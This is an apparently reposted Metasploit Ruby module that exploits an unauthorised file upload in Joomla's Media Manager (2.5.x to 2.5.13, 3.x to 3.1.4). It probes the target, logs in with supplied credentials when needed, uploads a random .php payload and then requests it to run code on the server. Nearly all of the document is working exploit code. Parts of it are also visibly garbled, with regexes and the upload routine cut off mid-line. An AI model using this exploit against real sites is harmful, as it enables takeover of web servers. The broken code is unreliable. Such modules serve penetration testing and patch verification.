[Metasploit] Joomla Media Manager File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::FileDropper

 def initialize(info={})
 super(update_info(info,
 'Name' => "Joomla Media Manager File Upload Vulnerability",
 'Description' => %q{
 This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
 which comes by default in Joomla, allowing arbitrary file uploads, and results in
 arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
 Manager, you will need to supply a valid username and password (Editor role or
 higher) in order to work properly.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
 'juan vazquez' # Metasploit module
 ],
 'References' =>
 [
 [ 'OSVDB', '95933' ],
 [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
 [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
 [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
 [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]
 ],
 'Payload' =>
 {
 'DisableNops' => true,
 # Arbitrary big number. The payload gets sent as POST data, so
 # really it's unlimited
 'Space' => 262144, # 256k
 },
 'Platform' => ['php'],
 'Arch' => ARCH_PHP,
 'Targets' =>
 [
 [ 'Joomla 2.5.x <=2.5.13', {} ]
 ],
 'Privileged' => false,
 'DisclosureDate' => "Aug 01 2013",
 'DefaultTarget' => 0))

 register_options(
 [
 OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
 OptString.new('USERNAME', [false, 'User to login with', '']),
 OptString.new('PASSWORD', [false, 'Password to login with', '']),
 ], self.class)

 end

 def peer
 return "#{rhost}:#{rport}"
 end

 def check
 res = get_upload_form

 if res and res.code == 200
 if res.body =~ /You are not authorised to view this resource/
 print_status("#{peer} - Joomla Media Manager Found but authentication required")
 return Exploit::CheckCode::Detected
 elsif res.body =~ /
 'POST',
 'uri' => "#{u.path}?#{u.query}",
 'ctype' => "multipart/form-data; boundary=#{data.bound}",
 'cookie' => @cookies,
 'vars_get' => {
 'asset' => 'com_content',
 'author' => '',
 'format' => '',
 'view' => 'images',
 'folder' => ''
 },
 'data' => post_data
 })

 return res

 end

 def get_upload_form
 res = send_request_cgi({
 'method' => 'GET',
 'uri' => normalize_uri(target_uri.path, "index.php"),
 'cookie' => @cookies,
 'encode_params' => false,
 'vars_get' => {
 'option' => 'com_media',
 'view' => 'images',
 'tmpl' => 'component',
 'e_name' => 'jform_articletext',
 'asset' => 'com_content',
 'author' => ''
 }
 })

 return res
 end

 def get_login_form

 res = send_request_cgi({
 'method' => 'GET',
 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
 'cookie' => @cookies,
 'vars_get' => {
 'view' => 'login'
 }
 })

 return res

 end

 def login
 res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
 'cookie' => @cookies,
 'vars_get' => {
 'task' => 'user.login'
 },
 'vars_post' => {
 'username' => @username,
 'password' => @password
 }.merge(@login_options)
 })

 return res
 end

 def parse_login_options(html)
 html.scan(//) {|option|
 @login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
 }
 end

 def exploit
 @login_options = {}
 @cookies = ""
 @upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
 @username = datastore['USERNAME']
 @password = datastore['PASSWORD']

 print_status("#{peer} - Checking Access to Media Component...")
 res = get_upload_form

 if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/
 print_status("#{peer} - Authentication required... Proceeding...")

 if @username.empty? or @password.empty?
 fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
 end
 @cookies = res.get_cookies.sub(/;$/, "")

 print_status("#{peer} - Accessing the Login Form...")
 res = get_login_form
 if res.nil? or res.code != 200 or res.body !~ /login/
 fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form")
 end
 parse_login_options(res.body)

 res = login
 if not res or res.code != 303
 fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate")
 end
 elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ / 'GET',
 'uri' => normalize_uri(target_uri.path, "images", @upload_name),
 })

 end

end

Baca Selengkapnya... [Metasploit] Joomla Media Manager File Upload Vulnerability